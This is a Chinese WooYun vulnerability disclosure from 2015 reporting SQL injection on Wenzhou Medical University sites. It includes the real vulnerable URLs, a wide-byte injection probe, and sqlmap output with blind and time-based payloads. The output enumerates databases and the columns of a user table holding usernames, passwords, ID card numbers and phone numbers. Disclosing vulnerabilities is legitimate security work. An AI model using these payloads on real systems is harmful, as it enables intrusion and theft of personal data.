当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114090

漏洞标题:温州医科大学多处SQL注射漏洞

相关厂商:温州医科大学

漏洞作者: 凌零0

提交时间:2015-05-14 18:15

修复时间:2015-05-19 18:16

公开时间:2015-05-19 18:16

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-14: 细节已通知厂商并且等待厂商处理中
2015-05-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

打算找宽字节注入的,http://www.wmu.edu.cn/view.php?id=c18e790c-f910-11e4-a3a3-d70b5c2416ab,随便试试,哈哈。。http://www.wmu.edu.cn/view.php?id=c18e790c-f910-11e4-a3a3-d70b5c2416ab%df' 有货

详细说明:

1.
http://www.wmu.edu.cn/view.php?id=c18e790c-f910-11e4-a3a3-d70b5c2416ab


)EF])AX)S]SVDDB@ZH_FM`5.png


2.
http://rsc.wmu.edu.cn/List.php?BigCategoryId=28
3.
http://rsc.wmu.edu.cn/List.php?BigCategoryId=28&SmallCategoryId=76 BigCategoryId参数
<code>GET parameter 'BigCategoryId' is vulnerable. Do you want to keep testing
the oth
ers (if any)? [y/N]
sqlmap identified the following injection points with a total of 204 HTTP
(s) req
uests:
---
Parameter: BigCategoryId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: BigCategoryId=28 AND 2471=2471
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: BigCategoryId=28 AND (SELECT * FROM (SELECT(SLEEP(5)))tznW)
---
[13:04:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.13
back-end DBMS: MySQL 5.0.12


available databases [3]:
[*] information_schema
[*] rsc_wzmc_edu_cn
[*] test
</code>

漏洞证明:

Database: rsc_wzmc_edu_cn
[8 tables]
+---------------------------------------+
| xsc_bigcategory |
| xsc_infolist |
| xsc_managers |
| xsc_photoinfolist |
| xsc_smallcategory |
| xsc_special |
| xsc_users |
| xsc_webinfo |
+---------------------------------------+
Database: test
[2 tables]
+---------------------------------------+
| SQL Statement |
| xsxx |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+


看看xsc_users 表:

[13:33:52] [INFO] retrieved: id
[13:33:57] [INFO] retrieved: bigint(20)
[13:34:20] [INFO] retrieved: username <---------
[13:34:42] [INFO] retrieved: varchar(50)
[13:35:13] [INFO] retrieved: password <---------
[13:35:34] [INFO] retrieved: varchar(50)
[13:36:02] [INFO] retrieved: usertype
[13:36:25] [INFO] retrieved: varchar(10)
[13:36:57] [INFO] retrieved: realname
[13:37:16] [INFO] retrieved: varchar(50)
[13:37:43] [INFO] retrieved: nation
[13:37:58] [INFO] retrieved: varchar(10)
[13:38:29] [INFO] retrieved: sex
[13:38:38] [INFO] retrieved: varchar(10)
[13:39:08] [INFO] retrieved: birthyear
[13:39:35] [INFO] retrieved: varchar(50)
[13:40:03] [INFO] retrieved: birthmonth
[13:40:29] [INFO] retrieved: varchar(50)
[13:40:55] [INFO] retrieved: birthday
[13:41:16] [INFO] retrieved: varchar(50)
[13:41:48] [INFO] retrieved: nativeplace
[13:42:24] [INFO] retrieved: varchar(50)
[13:42:50] [INFO] retrieved: cardid
[13:43:12] [INFO] retrieved: varchar(255)
[13:43:45] [INFO] retrieved: telephone
[13:44:09] [INFO] retrieved: varchar(5

还没跑完

修复方案:

过滤,可能还有编码问题,你们更专业~ ~

版权声明:转载请注明来源 凌零0@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-19 18:16

厂商回复:

最新状态:

暂无